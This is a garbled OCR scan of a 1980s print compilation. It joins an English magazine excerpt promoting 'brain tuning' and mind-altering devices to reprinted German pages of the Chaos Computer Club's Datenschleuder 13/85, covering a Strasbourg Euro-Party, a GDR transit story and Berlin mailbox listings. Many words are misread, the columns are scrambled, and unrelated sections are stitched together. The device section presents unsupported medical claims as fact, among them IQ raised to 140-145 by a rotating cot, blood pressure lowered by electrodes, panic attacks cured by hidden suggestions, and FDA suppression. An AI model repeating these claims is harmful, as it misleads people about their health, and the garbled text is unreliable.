sine waveatan cxtrcmcly low ampliludc (in the 
microamperage ränge, about 100 times bclow 
normal ncuro-firing levcls). Pope insisLs that this is a key lo its 
effcclivcness: “Il’s not ’driving’ or ’entraining’ the brain's elcctrical 
activiiy," hc says, "bui inslcad is gently, subtly stimulaling the brain in a 
way that is very natural, and is pcrccivcd by tlrc brain not as somclhing 
cxlcmal bul as a pari of its own aclivity.” 

The dcvice is about the size of a box of stick matches, and has a 
frcqucncy sclcctor knob which allows you to choose any frcqucncy from 
2Hz(in the Delta ränge) up lo 12 Hz(high Alpha).Two clcctrodcs arc 
placedagainstthcmastoid bonc bchind Ihcear. Most users will not bcablc 



The 

Brain Tuner 

The Electric 
Martini 


Alphatronic 

III 

Subtly 

Stimulating 


MARCUS BAOGLEY 
































































































































they sccrti to actually entrain Ihe brainwaves of many people. One such 
dcvicc now availablc is the MOOD PACERII. Unlike the neuro electric 
Stimulation dcvices, the Mood Pacerdocs notrequire electrodes attached 

10 the head or body. In fad, the field produced by the pacer—a wirelcss, 
battcry-powered box about Ihe size of a bar of soap—can be effcctive 
scvcral fect from the dcvice. However, while virlually everyone is 
affeded by direct eledrical Stimulation, it seems thal only about 35 
pcrcent of subjects tested are sensitive Io magnetic brainwave pacing. 

We have already discussed the possible benefits of entraining brain¬ 
waves throughou t the whole brain. Il should be noted that the Mood Pacer 

11 pulsates—and entrains brainwaves—at a frequency of 7,83 Hz.This is 
also known as the “Schumann resonance.” This has been found to be one 
of those "window" frequencies that appear to have a widc ränge of 
bcneficial effccls on humans, ranging from reports of enlianced healing 
U 3 accclcralcd leaming. When a biological System vibrates at this fre¬ 
quency, it can be said to be in a state of resonance or entunement with the 
planct’s own magnetic frequency, and it is perhaps this rhythmic unity 
wiih whai has been callcd the earlh’s “natural brainwave” that produces 
such profound effects. Bob Beck explained itin terms of Bohm’s theory 
of the Holographie brain—“If you can ping a specific element of that 
hologram you can ping the entire structure, said Beck. In this case, 
using this wcak pulse ai 7.83 Hz you can ping the whole structure and have 
very dccidcd cffccLs.” 

ln addiiion to entraining brainwaves, the magnetic pulse gcncrator 
scems lohaveolhcr benefits. Inrecentyearsourcivilizationhasimmersed 
iisclf in a dense elcctromagneüc “smog" of conflicting electromagnelic 
intcrfcrcncc and man madc radiation “noise," including microwave and 


to focl any clcctrical tingling, but when used for 20 to 40 minutes while 
remaining quict, prcfcrably in a meditative state, the effccls are siriking 
and long lasling. Most users cxpcriencc an immcdiaie sense of change. 
Expcricnccd mcdilators claim it helps them enter the deepest meditative 
Stales very quickly. It has also proven effcctive in producing focussed, 
highly alert States effcctive for reading or work. 

A rccent issue of the Psychoiherapy Newsletter was largely devoted 
10 an cxploration and discussion of this device, and the authors noted that 
it seemed effcctive in reducing blood pressure of hypertensives, reduced 
anxicly, produced a state similar lo a mild hypnolic trance, increased 
ability to conccntrale, and they concludcd il“may well revolutionize the 
practice of psychoiherapy by making significant inroads into the use of 
biofccdback and Chemicals as adjuncLs to 'the talking eure.’” 


EndomaX Endomax, rccently dcscribed in 

Magical Blend (Issue #15), plugs into a 
Walkman-likc cassette playcr. An endlcss tape 
Electronic loop plays in the cassette playcr, butlhereisa 
Sedative or special adaptor that iransforms the sound 

Stimuiant frequencies of the tape into electrical 

frequencies that are dclivered lo the brain 
ihrough electrodes placcd on the mastoid boncs-ITius far inventoried 
Alsop provides four different tapcs/frequcncies: one stimulaling the 
rclcasc of endorphins, onc to Irigger the mood elevatingneurotransmitler 
norepinephrine, one rcleasing sedative neurolransmitlers that are our 
natural Valium and Librium, and one which is an energizing stimuiant, 
rcleasing norepinephrine as well as dopamine or so Alsop Claims. 


Mood technique of electrical Stimulation that 

has aroused great inlercst among scientists in 
POCOr II rccent years is the use of pulsed 

Healinn elcctromagnetic fields (PEMF). Used by 

Enhanced Heal g „umbers of orthopedic surgeons 10 

& Accelerated ^g^bat such common bone diseases as osteo- 
Learning porosis and “ununited" fraclures (broken bones 

thal won’l heal), PEMF also seem lo have the property of entraining or 
“Pacing” ihe body's cells by activating sensitive neuronal receptors. 
When ihcsc PEM Fs are luned to frequencies in the human EEG ränge. 


radar, causingour cells to lose contact with many natural micropulsations 
andelcctromagnctic fields. Research hasproven that this elcctromagnetic 
pollulion can have a wide ränge of harmful effccls. As Bob Beck 
dcscribed ilto me, "Man as abiocosmicresonator is exlrcmcly sensitive 
to EM fields.” Bui magnetic pacers can apparcnlly act as a 
counlcrmeasure lo this environmental electromagnelic pollulion. 
AUhough the Signal sirenglh of ihe pacer is slighl (only milliwatts, or 
ihousandihsof a wall) ihcre seemto be mechanisms in living tissue, such 
as long-chain liquid-crystal dipolcs, thal exhibit supcrconductivc 
characlcrislics that ullow Ihc PEMFs to override the dcslructive envi¬ 
ronmental elcctromagnetic noise pollulion. Bccause the device is dose lo 
ihc uscr's body, its wcak signul overrides rauch stronger sourcos ai a 
distancc. 

Many invenlors and olhcrs involvcd in the use of EM dcvices believe 
thal Ihe FDA and other powers thal be are trying to suppress the use of 
such dcvices. As Bob Beck told me, “At this poinl we could be on ihe 
vergeof a giant sicp in human evolulion. We’rc only operaling at a small 
perceniagc of our potential, and EM Stimulation can have powerful 
effects. However, vcslcd intercsts are always opposed lo change, whether 
it’s free energy or a bcllcr carburcior. But morc and moro people arc 
bccoming aware of Ihc possibilily of thcsc things. 1 hcre’s an explosion 
of informalion. Al this poinl an informed public is the best safeguard.” 

This rcccnily dcvcloped dcvice is billed by 
its inventor. Keiih Simons, as “the ultimaie 
brainwave enlrainmenl dcvice.” It uses a 
variety of mind altering forces lo allow the uscr 
to control, or “entrain’' brainwave aclivity 
First, it uses a very low amplitude sine wave 
that is very similar lo that of the Alphatronic lll 
which is sent directly into the brain via several electrodes placed on the 
head. To that it adds a PEMF thal pulsates at the samc frequency as the 
electronic Signal. In addiiion, it uses slroboscopic lighls and pulsaiing 
Sounds in synchronous rhyihm with the electrical wave and PEMF 
Simons Claims that “the morc sensory inputs into the ccnü'al nervous 
System ihat are synchronized al the same frequency, the grcaler the 
entrainment produced." 

Since the Alphapaccr 11 can bc adjusted to frequencies in both the 
alpha and iheta ränge, it is quite efficient in producing altered States of 
consciousness that fealure colorful visualizations, intense and spontane 
ous memories, deep relaxation, sudden Creative insights, and so on 


AlphaPacer 

II 

Altsred States of 
Consciousness 





As babies we are rocked. As kids we roll 
down hills, spin unlil we’re dizzy, ride roller 
coastcrs. As adults we scuba dive, skydive, 
hang glide, drive fast, dance like mad, and, 
whcn tired, sit in rocking chairs. According lo 
elccirical enginecr/invcntor David Graham, 
such movc mcntsarcnotonlyfunbut esscnti al: 
Ihcy slimulale our brains, and, in high doscs, thcy can incrcasc 
intclligence. He has invcnicd a device, thc Graham Potcntializcr, to do 
just Ihat. 

The device appears to be a modest cot with a motorconcealed beneath 
it, and a large box at Ihe head, As the user lies back on the cot the cot 
rcvolves—the user rises and falls rhythmically ihrough a circle. The 
movement is smoolh, and fcels very good. With each cycle the user 
revolves through the elcciromagnetic field produced by the box at the 
cot’s head. 

EEG Studios of the effects of the device indicate that the machine 
induccs Sharp increascs in thc produclion of slow brain waves, shifts 
hemispheric dominancc (resulting in a balancing of the two hemis- 
phercs), and, most inlriguingly, optimizes the neural efficiency quotient 
(NEQ), a mcasurc of how rapidly elccirical Signals are transmitted 
by Ihe brain’s neurons—a characleristic that has conelated very 
closcly to IQ scores. Says Graham, the device “can increase the 
intclligence or mental funclioning of a normal adult—someone with 
an average IQ—lo an IQ of about 140-145.” 

To explain these benefits, Graham suggests that the rotating 
affectslhe fluids that compose about 90 percentof our bodyvolume, 
and particularly the fluids of the vestibulär or inner ear System. ‘The 
millions of nerve endings in your inner ear,” says Graham, "resppnd 
to movement with electrical responses that are carried throughout 
the brain, triggering an enormous amount of neural activity. This 
neural activity is of an uncommon sott, not only stimulating many 
different parts of the brain, but causing the neurons to forge new 
Connections. So what the rotation is really doing is ‘exercising’ the 
brain—allcring and incrcasing the flow of neuroelectricity and 
ncurochcmicals to large arcas of the brain. The first ihing this kind 
of vestibulär Stimulation docs is bring about a dramatic increase in 
yourmotor and Icaming capabilitics. In other words, the ‘exercise’ 
has a brain building cffect, just as physical exercise has a body- 


One mind altering tool many of us are 
familiär with is thc flotation tank. One of the 
variely of ways flotation can boost Icaming 
abilities is by dramatically increasing the 
floater’s receptivity to new informalion. Now, 
New York psychologist Dr. Lloyd Glauberman 
in collaboralion with neuropsychologist Dr. 
Phil Halboth has devcloped a new way of using the hyper-rcceptivity 
induced by floating: hc has crcated a series of extraordinary audio tapes 
spccifically designed to be heard while in the flotation tank. The tapes use 
state-of-the-art digital rccording technology incorporating the latest 
rcscarch in informalion processing and laieralization of functions in the 
brain hemispheres lo present messages stimulating rapid and dramatic 
bchavioral change, in a technique Glauberman and Halboth call 
HYPNO-PERIPHERAL PROCESSING. 

Once in the tank, and wearing Stereo headphones, you hear calm 
voiccs against a background of stately, soaring Synthesizer music genlly 
guiding you into a deeply relaxed state. Then the Soundtrack divides and 
you hear a separate voice in each ear, each voice narrating a different 
fairy-tale-like story—charming tales of wizards, magic cities, 
intergalactic zoos, mystic shoemakers and dream machines. ‘The 
simultaneous input overloads the conscious mind,” says Glauberman, 


building cffect." 

Hypno- 

Peripheral 

Processing 

Overloading the 
Conscious Mind 


Graham 

Potentializer: 

The Pleasures 
of Merely 
Circulating 


“bccause there is simply too much informalion to process consciously.” 
Unable to focus on either story, your conscious mind scems to lei go or 
tum off. 

Using the hypnolic tcchniques of Milton Erickson, with elements of 
neurolinguistic programming, Glauberman and Halboth have loadcd the 
tales with a variety of powerful suggestions, though the suggestions are 
couched in indirect terms and seem simply pari of the story, so that thcy 
go undetccted. Also, since the mind can at best focus on one of the stories 
(and usually gives up and stops paying conscious attention altogether), 
most of the stories themselves, and the hidden messages thcy contain, 
bypass thc consciousness entircly, enlcring the unconscious mind. 

Tolopoff this barrage ofinformationaloverload, yetanolher series of 
suggestions has bcen imbedded in thc tapes by an imaginative combining 
and interweaving of words and phrases from the two separate sound 
Iracks in such a way that they can only be perceived peripherally by the 
combined functioning of bolh brain hemispheres. 

Thus far Glauberman and Halboth have created a series of 14 tapes 
(with applicaüons that include increased creativity, enhanced problem 
solving abilities, weight loss, stress management, improved time man¬ 
agement and reduclion of smoking and drinking, among others). Most of 
their clicnts float oncc a weck while listening to the appropriate tapes. In 
a recent informal study of these subjects, Glauberman and Halboth 
discovered that the combination of the tank and the tapes “had a definite 
and profound impact on everyone.” I pcrsonally have tested these tapes 
out on a variety of individuals and have bcen impressed with ihcir 
effeclivcness. 

Oflen, the responses to thc tapes were unexpected. “One man was 
Corning to me for depression," says Glauberman. “A few days after 
listening to a tape, he came to me with excitement and told me that the 
panic attacks he had whenever he came into New York had abruptly 
disappeared. Well, he’d nevereven told me he was having these attacks! 
1 lookcd over the peripheral messages on the tape he’d heard and found 
that one of the tales mentions offhandedly that the central character, who 
is exploring a magic cily, ‘feit comforlable now in the city.’ Apparently 
Ihe man’s subconscious had feit the need for that change and had 
somehow opened itself up to that specific message ffom the tape. This 
suggests that an unconscious Scanner is at work to select indirecthypnotic 
or subliminal messages that have meaning for the person’s life.” 

Though designed to be used in the float tank, it has been discovered 
ihrough extensive experimentation that the HPP tapes are equally effec- 
tive when any tool is used—Synchro Energizer, Graham Potentializer, 
etc.—that is effective in puiiing the user in that state of extraordinary 
receptivity to new information and to behavioral change or “rcimprint- 
ing” that accompanies thc Ihcta state. 


To leam more about brain boosling deviccs, including addresses of 
manufacturers, and for further informalion, including news of new 
devices and thc latest rcsearch in the field, write: MEGABRAlN, P.O. 
Box 1059, Cooper Station, New York, NY, 10276. For an in depth 
accountofbrain-altering technology,consultAfegaBram.-AlewToo/s and 
Techniques for Brain Growth and Mind Expansion, 


BRAIN-TECH heißt eine junge Firma in Heidelberg (Panorama¬ 
straße 29), die sowohl das Buch MegaBrain vertreibt wie auch einen 
Großteil der hier beschriebenen Geräte. BRAIN-TECH ist auch der 
Titel eines Buches zum Thema, das innerhalb der Reihe Der Grüne 
Zweig im Winter 1988 erscheinen wird. 

Was hallen Sie als Außenstehender von Intelligenz? 





.. .nachdrücklich empfohlen 


Hier sind sie, die lang erwarteten Nachdrucke von daten- 
schleuder 13 bis 25. 

Diesmal ist wohi keine Panne passiert wie bei Teil 1 der 
Hackerbibel; dort war ausgerechnet in der allerersten Ausgabe 
der Datenschleuder bei den „Aufgaben für die nähere Zukunft" 
der Punkt 10 „Alles was Spaß macht und nichts kostet" unter 
Totenköpfen verschwunden. 

Weggelassen wurden diesmal - absichtlich - nur überholte 
Bestellfetzen. 

Geschaffen nach dem Vorbild der tap und trotzdem anders 
- siehe Hackerbibel Teil 1 - wurde die Datenschleuder, das 
wissenschaftliche Fachblatt für Datenreisende im Orwelljahr 
1984. Jetzt erscheint sie im fünften Jahr. 

Die Zeitschrift wurde und wird ehrenamtlich produziert. Die 
einzigen, die bezahlt werden, sind die Post fürs Porto und die 
Drucker (und letztere nicht immer sofort - danke fürs Ver¬ 
ständnis!). 

Die Datenschleuder ist in vielem unüblich und jede Ausgabe 
bringt eine neue Mischung mit amüsantem, brisantem, aktuel¬ 
lem oder aktuell werdendem Material aus der Welt der Daten¬ 
reisenden. 



Wir wünschen viel Spaß bei der Lektüre! 




C9927F 
DM 2,50 






S)aten§tf)lettbet? 

Oktober-Ausgabe Nr. 13/85 
Das wissenschaftliche Fachblatt für Datenreisende 
Ein Organ des Chaos Computer Club 
Im NovembGr erscheint 74/85 * Schwerpunkt Freuen und Computer 


Das CHAOS-TEAM macht mobil: 


EURO-NOTRUF Strassburger 


f 


Die technologische Herausforderung 

Das Euro-Parlament (EP) stellt seine nächste Sitzung in Strassburg vom 
7. bis 11. Oktober 1985 unter das Motto "Die technologische Herausfor¬ 
derung". Neben einigen eigenen Berichten und Debatten über die 
"Herausforderung" von USA, Japan und dem Pazifik-Becken findet ein 
Symposium und eine AUSSTELLUNG statt. Auf ihr sind allerlei europäi¬ 
sche Firmen mit ihren Robotern und ähnlichem vertreten. 

Unter anderem ist geplant; keilen, ein kreuz-und-quer (ür menschliche Be¬ 

ll Zehn Berichte des Parlaments und Debatten dürfnisse. Auch der Fotokopierer ist nicht ein- 
zum Thema neue Technologien: fach ein Herrschaftsinstrument, sondern auch 


Euro-Party 

Zusammen mit den Kollegen vom KGB (München) 
partyzipiert das CHAOS-TEAM vom 7. bis 9. Oktober 
an der EP-Sitzung in Strassburg und besetzt ein 
Büro. Dort und in der Umgebung wollen wir unsere 
Interessen und Ansichten zu den neuen Technolo¬ 
gien nutzen und diskutieren. Während dieser Zeit 
ist das CHAOS-TEAM am Daten-und Telefonnetz 
erreichbar. 

Gezeigt wird Mailbox-Kultur und Ansätze zu einer 
Informationsgesellschaft von unten sowie Berichte 
über Machtumverteiiung durch Nutzung neuer 
Technologien. Die Teilnahme des Chaos Computer 
Club am Blödeltextsystem der DBP (Btx) hat ver- 


■ Europa gegen Usa/Japan 

■ ein europäischer Forschungsraum 

■ die technologischen Probleme, die sich aus 
dem Beitritt von Spanien und Portugal ergeben 

■ Technologietransfer 

■ die Auswirkungen der neuen Technologien für 
die europäische Gesellschaft 

■ die sozialen Auswirkungen der neuen Tech¬ 
nologien 

■ neue Technologien und Schulbildung 

■ europäisches Technologiefclgeabschätzungs- 
institut (tolles Wort) 

• europ. Weltraumpolitik 

■ neue Technologien im Transportbereich 

■ Frauen und neue Technologien 

2) Allgemeine Rede-Orgie von Dienstag bis 
Mittwoch 

Symposium mit erlauchten und erwählten Gä¬ 
sten von Lothar Spaeth über den Chef von 
Olivetti, der EG, Ciba-Geigy. Battelle-Institut, 
allerlei Computer- und sonstigen Wissen¬ 
schaftszeitungen, DGB. CERN na und so weiter 
und so fort, bloß keine einzige kritische Seele. 
Wir können das leider nur über Video verfolgen, 
da wir wohl alle nicht erlaucht genug sind. 
Teilweise sind die Leute ganz interessant, eben¬ 
so der Tross von ausgewählten und eingelade¬ 
nen Fachjournalisten aus ganz Europa, 
Ausstellung: europ. Weltraum Agentur. Airbus. 
Siemens. AEG. Max Planck. Thomson. Bull. 
Philips. Sinclair. Bayer. Henkel usw. 50 Unter¬ 
nehmen zu Computer. Telekom. Biotechnik, al¬ 
ternative Energieträger, Weltraum. Laser ... 
ESPRIT; EURONET-DIANE. JET; RACE: und wie 
die Europrogramme alle heissen. Auch dabei 
die Informatik-Abteilung von EG und EP. 

Uns geht es darum, zu zeigen, daß Computer 
nicht nur eine Sache der großen Firmen für 
Rationalisierung. Überwachung, Kontrolle, 
Steuerung etc. sind. High Technologie ist auch 
low down on the base wichtig. Neben dem 
üblichen von-oben-nach-unten oder unten- 


das Ende bestimmter Zensurformen. Langsam, 
aber sicher entsteht bei den neuen Technolo¬ 
gien eine Gegenkultur. 

Bisher denken die Freaks oft genug nur neue 
Programme usw. aus und blicken (nurl) da 
durch, aber eine Kommerzmafia vertreibt und 
kontrolliert das ganze in grossem Stil. 

Da stellt sich die Eigentumsfrage aus der Sicht 
des Systementwicklers und der Gesellschaft: 
Wem gehört eigentlich das ganze Wissen, das 
da akkumuliert wird? Sind Informationen eine 
Ware wie jede andere auch oder steckt in ihrer 
Erscheinungsform, aber auch in der ganzen 
Umstrukturierung von Kontrolle. Steuerung, 
Wissen = Macht usw. eine neue Melodie? Radi¬ 
kale Öffentlichkeit, freier Fluss von Daten und 
Informationen ist doch viel effektiver - von 
gerechter ganz zu schweigen! Und wohin geht 
die Reise, genauer; Wer will wohin? In Diskus¬ 
sionen wollen wir darüber nachdenken und 
Gegenpunkte setzen im Angesicht der europäi¬ 
schen Hurra-Patrioten, die nicht mal mit nem 
Taschenrechner umgehen können, aber ständig 
"Bekennen", dass "die" neuen Technologien 
tierisch wichtig wären, überall emgeführt wer¬ 
den müssen und Europa sich gegen USA. Japan 
und das ganze pazifische Becken durchsetzen 
müsse, konkurrenzmässig & blind. 

Nur reden genügt nicht, klar; aber der Erfah¬ 
rungsaustausch ist wichtig. Aha-Erlebnisse 
gibts. wenn was nicht oder anders funktionieri 
als vorgesehen. Ne andere Frage, keine Frage, 
ist die Datensicherheit in Europa; wieder ne 
andere die Borniertheit von Bürokratien wie der 
Deutschen Bundespost und verwandten euro¬ 
päischen Vereinigungen. Eine ganz banale Ge¬ 
schichte, auf die die einige europäische Parla¬ 
mentarier scharf sind: die EG-Kom.mission ver¬ 
weigert ihnen konsequent den Zugang zu be¬ 
stimmten internen Datenbanken. Dabei soll das 
Parlament doch gerade kontrollieren! 

Wenn die nun mal sehen könnten was sie nicht 


deutlicht, was alternative Informationsdienste in 
neuen Medien machen können. Das ist mehr als 
nur Salz in der kommerziellen Suppe. 

Jetzt führen zunehmend Firmen Mailbox-Systeme 
zur Sachkommunikation (Bestellwesen u.ä.) ein, 
ohne die-Hintergründe uncf die Veränderungen von 
Informationsstruktur und der Datenilüsse im ein¬ 
zelnen zu erkennen. 

Gerade die elektronischen Briefkästen und Schwar¬ 
zen Bretter verformen die bisherigen Machtstruk¬ 
turen. da jeder Teilnehmer (ohne an einen Amts¬ 
weg gebunden zu sein) direkt agieren kann. Manch 
kleiner Sachbearbeiter merkt durch die neue An¬ 
schaulichkeit im Datenfluß, daß sich etliche Vorge¬ 
setzte nur durch das Weiterleiten von Ideen der 
unteren Chargen auf ihren Posten behaupten. Doch 
auch die negativen Folgen, die sich durch das 
elektronische Überwachen von Privat-Post in 
Mailbox-Systemen ergeben, müssen analysiert 
werden, Erfahrungen über "Postkriege" in größe¬ 
ren US-Firmen liegen vor. 

Weitere Themen und Anregungen für die Straßbur¬ 
ger Euro-Party: 

■ Datenbarken der EG. zu denen das EP keinen 
Zugrifl hat und was dort alles drinsteht 

■ "Volks-Computer": Mailboxen-Kultur etc. 

• Neue Techniken bei Grünen und Alternativen 

■ Chancen neuer Technik bei der Aufdeckung von 
Skandalen am Beispiel von Greenpeace 

■ Die Postverwaltungen: Hüter sozialer Daten- 
Gerechtigkeit oder Hanswurst gegen die Medien- 
uno Datenkonzerne 

■ Daten: Grenzüberschreitungen und Hindernisse 

• Praktische Kritik an sinnloser Computerisierung 

■ und so weiter und so fort. 

Der Phantasie sind wie immer nur die eigenen 
Grenzen gesetzt. Ideen. Anregungen. Texte, ... an 
CHAOS-TEAM über die Datennetze. Möglichkeiten 
des Büros werden genutzt, um diese Anliegen zu 
verbreiten. Ausführlicheres Programm liegt noch 
nicht vor. Es wird alles schon irgendwie klappen. 
Ter.min: Mo.. Die. und Mittwochvormittag. 

Werft eure Imaginationsmaschinen an! ct 
europafß.ws 850929 2140 


nach-oben. dem zentralistischen der neuen sehen sollten. . . by h. 

Technologien gibts auch dezentrale 

Möglich- 

INHALT; Inhaltsverzeichnis Datenschleude 13/85 
1 EUROPA: die Europa-Seite mit einem Euro-Nolruf, Treffen in 
Straßburg, Euro-Party von Computerfreaks. 

1 CCORTS: Zahlen. Daten. Fakten. Adressen. 

2 TRANSl: Berlin und die Welt: Chaos mobil - ein Reisebericht. 

2 KULTUR: Mailboxen in Berlin. 

2 POSTAN: Am |FA-Poststand. Furunkelausslellungsbesuchsbericht. 

2 WELTDS: Die Welt am Samstag. Drucker&Rolls Royce von Becker. 

3 ATA520: Der 520er. Innenleben und Umfeld. 520 DalensalTOS. 

3 ATACHA: Standardisierte Vernetzung worldwide: Chaos-Pläne. 

3 BASTAR: Der Bastard-Blitz. Ein Bündel ATARI-Anwender. 

4 ISDNOB: Post Future? 

4 BUCHSE: Heynes Halbschnellschuß. Militär gegen Hacker. Netzweber. 

4 IMPHES: Das Impressum. Immer wieder aktuell. 

5 COSYPG: Das Cursor Operation System, 

5 KIWIPG: Schönheit in Waffen. Ein neues Buch. 

6 FMANLA: Die Katze darf das Telefon abheben. Mailboxrecht. 

6 GEBUER: Der Gebührenprüfer schlug zu. 

6 DIGDNK: Digitales Denken. Ein mahnender Artikel. 

6 BURKHA: Schmierkram. 

6 GELDPR: Eine Geldscheiniressergeschichte. 

6 POSTEF: Warum die Post Probleme beim Briefkastenleeren hat. 

7 ??????: Aus der Hackerbibel entfernte Werbeseite. 

3 KURZZZ: Kurzmeldungen. 

8 MLUHAN: Wohin steuert die Welt. Eine Buchrezension. 

0 IFA-85: Einem großen Teil dieser Auflage liegt die ds-Ausgabe zur 
IFA’85 als dreiseitige Rückseite bei. Wir bitten um gnädige Beachtung. 
inhalt13.ws 850930 1845 


and NOWASÖf^ABöOr 
HOW TEcHNOLoqY 
CROSHES YöÜRSOVL... 



' “ w (n ^ Q. 

^ m S ä “ 

O — JC 

- lyi ^ a c u 

= o S S'Sxö 

■) k- X ^ ^ jz c 
^ a —- c ^ c u 

^ o cC05 

= O m^ 5 sS 
BCV o w^og 

: -v) —O- - 5 ; g g § 

: oio .-z:oSa 

". Ti 5 y < V rv - 
jOjCDJu ._-5: 

5 "o o) oj o O 2 - 

- 2!> 9 oS 

3 ■ —3 

jIT? 

juuuu 

JUUU< oX o c 

JOUGUclcq o b 








Chaos mobil 

Transit durch die DDR 
Fehler beim BKA 

On the road. Auf dem Weg von Hamburg nach 
Berlin, kurz hinter dem Horner Kreisel. 5 Leute 
im Granada, nicht ganz optimal, gehl aber. Wir 
erreichen die Grenze (West) mit der Musik ihrer 
Herren, der amerikanischen Nationalhymne- 
Rechtzeitig zum DDR-Grenzposten kommt die 
russische, die gefällt mit besser. Trotzdem müs¬ 
sen wir warten, zwei von uns haben keine 
Pässe, einer davon nicht mal einen heilen 
Perso. "Hier haben Sie Ihre vier Dokumente 
und einen Lappen,meint der Grenzer, der 
den Transit deshalb verweigert Man hätte die 
Seite doch vorher einkleben sollen. 

Bei der Rückfahrt von der Nichtfahrl eine kleine 
Kontrolle durch unsere grünen Jungs, Jetzt 
werden fünf Leute durch verläßliche Beamte als 
Berlin-Rückkehrer gespeichtert. Das ist natür¬ 
lich Unfug, denn vier fahren gleich darauf hin. 
Nur einer muß nach Hamburg zurücktrampen 
und sich einen neuen Ausweis besorgen- Das 
ist gespeichertes CHAOS im BKA-Compuier. Da 
hilft auch keine Rechtsschutzversicherung, 

Für uns vier das ganze nochmal Kassette mit 
Nationalhymnen rein, Pässe raus, warteri 
Nachdem die Identität des Persoinhabers mit 
sich selbst durch die Zahlung von 10 Mark 
bestätigi werden worden ist, gehts zu viert 
weiter. Das Telefon ist keinem aufgefallen und 
die rote Kelle hatten wir vorher zugedeckt. Oer 
Fahrtkomfort ist seit der Grenze erheblich ge¬ 
stiegen, man macht es sich gemütlich, Small¬ 
talk. der Zigarettenkonsum steigt. Schilder mit 
eigenwilligen Geschwindigkeitsbegrenzungen 
si^ie das Zählen vonn Autos im waid machen 
die Fahrt zu einem faszinierenden Erlebnis Wir 
wollen am Intershop halten, einen Kafiee trin¬ 
ken, aber da ist alles dunkel. Mond und Nebel 
und ein paar parkende VES-Lastei Wir fahren 
weiter. Gegen ein Uhr erreichen wir die Grenze, 
diesmal geht alles schneller. Dann Berlin. Ouar- 
tiersuche ohne Staotplan. Eine Telefonzelle ret¬ 
tet uns, da die Aussagen der Passanten zu 
unklar waren. Es lebe die Post. Oeep 

Der fünfte Mann fliegt 

Oer Tramp zurück war gut, Em LKW-Fahrer. der 
regelmäßig OOR-Touren hatte, hielt gleich. Er 
erzählte von seinem Berufsfahrersilz. Aut bun¬ 
desdeutschen Straßen gehen derartige Sitze zu 
Lebenszeiten des LKW eigentlich nie kaputt. 
Auf ODR-Slraflen halten sie rund em Jahr, 

Am nächsten Morgen wollte er mit dem Flug¬ 
zeug nach Berlin. Er schaffte es. innerhalb von 
10 Minuten (normale Bearbeilungszeit: eine 
Woche) einen neuen Personalausweis auf der 
Meldebehorde zu bekommen. Das Flugzeug 
erreichte er noch gerade so 
Merke: Auen Beamte körmen sehnen sein. Sie 
müssen nur ein Einsehen haben. Und braucnst 
du dringend einen neuen Perso und hast keine 
Woche Zeit, brauchst Du keinen Beamten be¬ 
stechen. Du buchst einen einfachen Flug nach 
Berlin (nur hin) und gehst mit dem Ticket und 
deinem kaputten Perso zur Meldebehörde. Das 
ist fast alles. LS 1t1 t'ans.T3»sa3cn?9(wi!) 


CCC- Berlin: 

Hey Freaks. Hacker, Craecker und sonstige Unru- 
hesliher Da ihr anscheinend alle der Meinung 
seid. Berlin sei das Cenirum der deulschen 
MailbovScene. werden euch nun einige Gesicht¬ 
spunkte dieses Anliegens nahe gelegt Einige von 
euch sind der Ansicht, hier gaebe es Mailboxen, 
wo man in einigen Rubriken lachen kann, m ande¬ 
ren reden bis man schwarz vor Schilling wird und 
m wieder andeien sein Intormationsniveu kullivie- 
ren kann Leider bedarf es sich euch zu enttaeu- 
schen. In Berlin gibt es zur Zeit mehr als 20 
Mailboxen, aber nur 5-6, sind akzeptabel. Der 
erbaermliche Rest zaehll sich zu den wahren 
Mehlboxen, deren Besuch nicht zu lohnen scheint. 
Die richtigen Berliner Freaks tretlen sich aus¬ 
schliesslich in den anerkannten Boxen, wobei nicht 
zu unleislelien sei, daß Oie nicht ernstzunehmen 
sind, die die anderen Boxen aufsuchen Grob 
lassen sich die Berliner User in S Kategorien 
einordnen: 

1. Die Begeisterten- Das sind die Leute, die zuviel 
Geld haben und fast taeglich dem Gilb ihr Bahres 
opfern, indem sie jede Box besuchen um zu sehen 
ob sich was geaenderl hat, jedoch selten etwas 
kreatives leisten .. 

2. Die Stimmungsmacher- Das sind Uspr.die alte 
paar Tage m ihre Stammboxen schauen und mchta 
besseres zu tun naben, als leden den sie erwi¬ 
schen. anmachen und verarschen. Also Typen, die 
jeden versuchen uhers Ohr zu hauen, was sogar 
dazu fuhren kann, dass sie aus der Mailbox fliegen 

3 Oie Ernsten- Das wiederum smd Leute, die jede 
Woche mal m die Box reinsehen um mit den 
Problemen des Alltags die armen Halbleiter voll 
zumütien Ernst zunehrnende Kreativitaet ist dabei 
allerdings nicht wahrzunehmen. 

4 Oie Kinder Das sind Troopies und Halbstarke, 
die nur hineirschauen um zu kontrollieren, ob S'e 
auch ja noch im Besitz der neuesten Compuierga- 
mes sind, sie gehen natuerhch in kemor Wciso auf 
andere cm 

5 Die Hacker- Dies sind homo sapiens, deren 
einzigstes Interesse aus der^ neuesten Passwörtern 
und Nuas besieht Mil mrem nicht endenden inror- 
mationshunger werden die Mailboxen erst zu 
einem neuen inferesaanie'> Medium. 

Mailboxen sma natueriicn nur so gui wie ihre 
SysOp’s. was oft vom Alter und den Programmior- 
kenntnissen der Typen abhangi Da gibt es m Berlin 
nun rund 20 Boxen, von denen ca. 12 mit der 
gleichen Software laufen, und die SysOp's zwi¬ 
schen 14 und <7 Jahren alt sind. Die meisten 
Mailboxen laufen auf C-64 mit z Teil 2-3 Fioppys, 
anders wiederum benutzen PC's mit Festplatten. 
Was ist nun so interessant an den Berliner Boxen-? 

- Eine Umlrage ergab, daß die Sexecke (nur ir> 
einer Box vorhanden) knapp vor den Pinboards 
luhrt. welches sonst immer ganz vorre steht. Da¬ 
nach lolgen die Rubriken wie Usergroup. Hacker¬ 
group, Inlos. SolLHardware-Berichle. Erfahrungs¬ 
austausch (was immer darunter zu verstehen 
sei...), ßerichle aus der Bundesrepublik und die 
lebensnotwendigen Informaiionen des Datex Net¬ 
zes. ln der Sexecke gibt es inzwischen schon 
richtige Forlselzungsromane von Or Know Char¬ 
lotte im Taumel der Lust, was bei einigen Usern 
der absolute Renner zu sein scheint Hier einige 
Nummern (Berlin Vorwahl. 030) 

CIZ 6118502/ Teletext 7850500/ Gerbnet 4144068/ 
Compac 8024228/ Coko 4652439/ CCS 7868178. 
by ede worked Oy obeiix. kviiuri3ivsa50930 i8ii 

Oie 


Poststandbesuch 

Wie in der Vertagsbeiiageangekündigi. besuch¬ 
te ein Teil des CCC sowie bayrische KGßier auf 
der Internationalen Furunkelausstellung '85 den 
Poststand uf>c lud alle Freunde zu einer Hac- 
